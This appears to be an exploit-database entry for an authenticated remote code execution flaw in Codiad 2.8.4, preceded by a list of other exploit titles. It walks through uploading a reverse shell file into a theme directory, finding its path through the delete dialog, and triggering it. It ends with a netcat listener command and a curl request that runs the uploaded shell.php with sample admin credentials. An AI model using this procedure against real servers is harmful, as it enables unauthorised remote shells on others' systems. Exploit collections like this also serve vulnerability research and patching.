7e3fa43161
9 changes to exploits/shellcodes Dynojet Power Core 2.3.0 - Unquoted Service Path Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH) YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH) 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH) Employee Record Management System 1.2 - 'empid' SQL injection (Unauthenticated) Ericsson Network Location MPS GMPC21 - Remote Code Execution (RCE) (Metasploit) Ericsson Network Location MPS GMPC21 - Privilege Escalation (Metasploit) i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)
29 lines
No EOL
1.9 KiB
Text
29 lines
No EOL
1.9 KiB
Text
# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)
|
|
# Author: P4p4_M4n3
|
|
# Vendor Homepage: http://codiad.com/
|
|
# Software Links : https://github.com/Codiad/Codiad/releases
|
|
# Type: WebApp
|
|
|
|
###################-------------------------##########################------------###################
|
|
# Proof of Concept: #
|
|
# #
|
|
# 1- login on codiad #
|
|
# #
|
|
# 2- go to themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/" directory #
|
|
# #
|
|
# 3- right click and select upload file #
|
|
# #
|
|
# 4- click on "Drag file or Click Here To Upload" and select your reverse_shell file #
|
|
# #
|
|
###################-------------------------#########################-------------###################
|
|
|
|
after that your file should be in INF directory, right click on your file and select delete,
|
|
|
|
and you will see the full path of your file
|
|
|
|
run it in your terminal with "curl" and boom!!
|
|
|
|
/var/www/html/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php
|
|
|
|
1 - # nc -lnvp 1234
|
|
2 - curl http://target_ip/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php -u "admin:P@ssw0rd" |